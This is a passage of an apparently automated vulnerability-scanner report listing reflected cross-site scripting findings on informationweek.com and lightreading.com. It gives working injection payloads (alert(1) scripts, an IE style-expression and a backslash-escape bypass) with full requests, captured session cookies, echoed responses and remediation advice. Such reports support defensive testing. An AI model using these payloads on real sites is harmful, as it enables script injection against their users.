HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:10 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:10 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30601
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security4b4d5" style=x:expression(alert(1)) 03ffb9b3c2/Pri;kvarticleid=;kvauthor=;loc=300;grp=186630068" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57d84'-alert(1)-'e25124c95b4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Privacy/57d84'-alert(1)-'e25124c95b4 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:26 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:26 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30223
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Privacy/57d84'-alert(1)-'e25124c95b4;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=448044662;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79216"a%3d"b"619f2192eeb was submitted in the REST URL parameter 2. This input was echoed as 79216"a="b"619f2192eeb in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/79216"a%3d"b"619f2192eeb/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:18 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:18 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30509
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/79216"a="b"619f2192eeb/Privacy/business-driven-access-mana;kvarticleid=;kvauthor=;loc=300;grp=447075128" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d0d5'-alert(1)-'9aaa8d0ebc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/1d0d5'-alert(1)-'9aaa8d0ebc/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:22 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:22 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30508
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/1d0d5'-alert(1)-'9aaa8d0ebc/Privacy/business-driven-access;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=660033644;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3af1c</script>7bfc2c6d31e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Privacy3af1c</script>7bfc2c6d31e/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:35 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:35 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30509
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Privacy3af1c</script>7bfc2c6d31e/business-driven-;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=313023278;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80485"%20a%3db%205ff5bb5c310 was submitted in the REST URL parameter 3. This input was echoed as 80485" a=b 5ff5bb5c310 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/Security/Privacy80485"%20a%3db%205ff5bb5c310/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:31 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:31 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30503
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Privacy80485" a=b 5ff5bb5c310/business-driven-acc;kvarticleid=;kvauthor=;loc=300;grp=143930602" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c59a3"><a%20b%3dc>e93b702473d was submitted in the REST URL parameter 4. This input was echoed as c59a3"><a b=c>e93b702473d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/Security/Privacy/c59a3"><a%20b%3dc>e93b702473d HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30189
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Privacy/c59a3"><a b=c>e93b702473d;kvarticleid=;kvauthor=;loc=300;grp=52091368" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71de5'-alert(1)-'515bb9dee72 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Privacy/71de5'-alert(1)-'515bb9dee72 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:46 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:46 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30223
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Privacy/71de5'-alert(1)-'515bb9dee72;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=813317067;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5171'-alert(1)-'5c4c640c20a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /e5171'-alert(1)-'5c4c640c20a/advancedSearch/resultsCollection.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:09 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:09 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30230
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/e5171'-alert(1)-'5c4c640c20a/advancedSearch/resultsCollect;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=376503650;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85369"%20style%3dx%3aexpression(alert(1))%2072142abc6e2 was submitted in the REST URL parameter 1. This input was echoed as 85369" style=x:expression(alert(1)) 72142abc6e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /85369"%20style%3dx%3aexpression(alert(1))%2072142abc6e2/advancedSearch/resultsCollection.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:06 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:06 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30299
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/85369" style=x:expression(alert(1)) 72142abc6e2/advancedSe;kvarticleid=;kvauthor=;loc=300;grp=115836270" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 312d8"%20a%3db%20ebf5838ee26 was submitted in the REST URL parameter 2. This input was echoed as 312d8" a=b ebf5838ee26 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/312d8"%20a%3db%20ebf5838ee26/resultsCollection.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:13 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:13 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30187
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/312d8" a=b ebf5838ee26/resultsCollection;kvarticleid=;kvauthor=;loc=300;grp=314329095" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f14f</script>f0ff90fd23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/6f14f</script>f0ff90fd23/resultsCollection.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:18 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:18 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30199
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/6f14f</script>f0ff90fd23/resultsCollection;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=996341790;misc='+new Date().getTime()+'"> ...[SNIP]...
3.793. http://www.lightreading.com/archives.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lightreading.com
Path:
/archives.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f0f0"><script>alert(1)</script>176e537623 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /archives.asp?reportsqueue=yes&4f0f0"><script>alert(1)</script>176e537623=1 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:12:23 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Last-modified: Sat, 11 Dec 2010 23:12:18 GMT Expires: Sun, 10 Apr 2011 19:12:18 GMT Etag: s200805.p200805 Content-Length: 239408 Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... <a href="http://www.lightreading.com/archives.asp?reportsqueue=yes&4f0f0"><script>alert(1)</script>176e537623=1&piddl_archivepage=2"> ...[SNIP]...
The value of the section_name request parameter is copied into the HTML document as plain text between tags. The payload 174c7<a%20b%3dc>c63612801ca was submitted in the section_name parameter. This input was echoed as 174c7<a b=c>c63612801ca in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /archives.asp?section_id=18,145,225,224,402,751§ion_name=Columns174c7<a%20b%3dc>c63612801ca HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:15:26 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Last-modified: Sat, 11 Dec 2010 23:15:23 GMT Expires: Sun, 10 Apr 2011 19:15:23 GMT Etag: s200805.p200805 Content-Length: 232673 Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... <span class="red big strong">Columns174c7<a b=c>c63612801ca</span> ...[SNIP]...
The value of the section_name request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4645\'%3bea759ddc404 was submitted in the section_name parameter. This input was echoed as c4645\\';ea759ddc404 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /archives.asp?section_id=18,145,225,224,402,751§ion_name=Columnsc4645\'%3bea759ddc404 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:14:37 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Last-modified: Sat, 11 Dec 2010 23:14:35 GMT Expires: Sun, 10 Apr 2011 19:14:35 GMT Etag: s200805.p200805 Content-Length: 232134 Cache-control: max-age=10368000, public
3.796. http://www.lightreading.com/blog.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lightreading.com
Path:
/blog.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9a3c"><script>alert(1)</script>db793d3da66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
